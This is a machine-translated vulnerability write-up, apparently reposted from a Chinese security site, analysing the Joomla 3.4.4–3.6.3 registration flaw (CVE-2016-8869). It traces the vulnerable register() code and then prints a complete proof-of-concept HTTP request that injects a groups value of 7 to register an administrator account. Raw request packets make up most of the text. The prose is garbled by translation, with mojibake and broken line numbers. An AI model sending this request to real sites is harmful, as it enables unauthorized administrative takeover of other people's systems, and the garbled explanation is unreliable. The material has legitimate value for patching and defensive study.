δ½εMYHACK58:62201681701joomla create a privileged user exploit analysis(cve-2016-8869)-vulnerability warning-the black bar safety net
0.929 High
EPSS
Percentile
99.1%
Vulnerability environment
Joomla version 3. 44 to 3. 63
Vulnerability description
This vulnerability and CVE-2016-8869 is a companion piece to the vulnerability, but this vulnerability than 8869 this vulnerability, the ideas more ingenious, more interesting. This vulnerability nature is also associated with 8869 of this vulnerability almost, are to appear in the user login registration place.
Vulnerability analysis
The entire vulnerability or and before the 8869 vulnerabilities similar, are out in the components/com_users/controllers/user. php UsersControllerUser::register ().
Request packet
First, by a request packet to analyze UsersControllerUser::register()of the entire registration process of the processing.
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
|
POST /joomla/index. php/component/users/? task=registration. register HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: EN-us,EN;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/joomla/index.php/component/users/?view=registration
Cookies: γCOOKIEγ
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------596020006637
Content-Length: 1036
-----------------------------596020006637
Content-Disposition: form-data; name=βuser[name]β
spoock
-----------------------------596020006637
Content-Disposition: form-data; name=βuser[username]β
spoock
-----------------------------596020006637
Content-Disposition: form-data; name=βuser[password1]β
123456
-----------------------------596020006637
Content-Disposition: form-data; name=βuser[password2]β
123456
-----------------------------596020006637
Content-Disposition: form-data; name=βuser[email1]β
[email protected]
-----------------------------596020006637
Content-Disposition: form-data; name=βuser[email2]β
[email protected]
-----------------------------596020006637
Content-Disposition: form-data; name=βoptionβ
com_users
-----------------------------596020006637
Content-Disposition: form-data; name=βtaskβ
user. register
-----------------------------596020006637
Content-Disposition: form-data; name=γTOKENγ
1
-----------------------------596020006637β
β|β
The use ofγγthe label of the COOKIE and the TOKEN requires the user to self-define, as to how to get these two values, the entire above article has done a very detailed description, here is not explained.
register()
The above POST request will be made of components/com_users/controllers/user. php UsersControllerUser::register()to be processed.
[! ](<http://7xrnu9.com1.z0.glb.clouddn.com/joomla-cve-8869/1.png>)
The program will run to$model->register($data). Where$data is the POST data in the user array.
register($temp)
Tracking$model->regsiter($data)method
components/com_users/models/registration. in php UsersModelRegistration::register($temp)
[! ](<http://7xrnu9.com1.z0.glb.clouddn.com/joomla-cve-8869/2.png>)
In to$temp for foreach traversal before, the presence of the statement
1
|
$data = (array) $this->getData();
β|β
This will be a$data variable in via the$temp to$data values to be assigned before the$data is already present the content, but also identifies the user type of the data.
[! ](<http://7xrnu9.com1.z0.glb.clouddn.com/joomla-cve-8869/3.png>)
As shown above, wherein the groups of the array value of 2, identifies this user as an ordinary user.
Successful registration
At the completion of the entire process, you will register an ordinary user.
[! ](<http://7xrnu9.com1.z0.glb.clouddn.com/joomla-cve-8869/4.png>)
PoC
In the know is to use the groups array for the user is identified, then it can be directly in the POST Data added to the groups array, the value is set to Administrator, the value(in joomla to 7), then you can create an administrator user.
POST data
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
1718
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
POST /joomla/index. php/component/users/? task=registration. register HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: EN-us,EN;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/joomla/index.php/component/users/?view=registration
Cookies: γCOOKIEγ
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------596020006637
Content-Length: 1125
-----------------------------596020006637
Content-Disposition: form-data; name=βuser[name]β
spoock
-----------------------------596020006637
Content-Disposition: form-data; name=βuser[username]β
spoock
-----------------------------596020006637
Content-Disposition: form-data; name=βuser[password1]β
123456
-----------------------------596020006637
Content-Disposition: form-data; name=βuser[password2]β
123456
-----------------------------596020006637
Content-Disposition: form-data; name=βuser[email1]β
[email protected]
-----------------------------596020006637
Content-Disposition: form-data; name=βuser[email2]β
[email protected]
-----------------------------596020006637
Content-Disposition: form-data; name=βuser[groups][]β
7
-----------------------------596020006637
Content-Disposition: form-data; name=βoptionβ
com_users
-----------------------------596020006637
Content-Disposition: form-data; name=βtaskβ
user. register
-----------------------------596020006637
Content-Disposition: form-data; name=γTOKENγ
1
-----------------------------596020006637β
β|β
Related
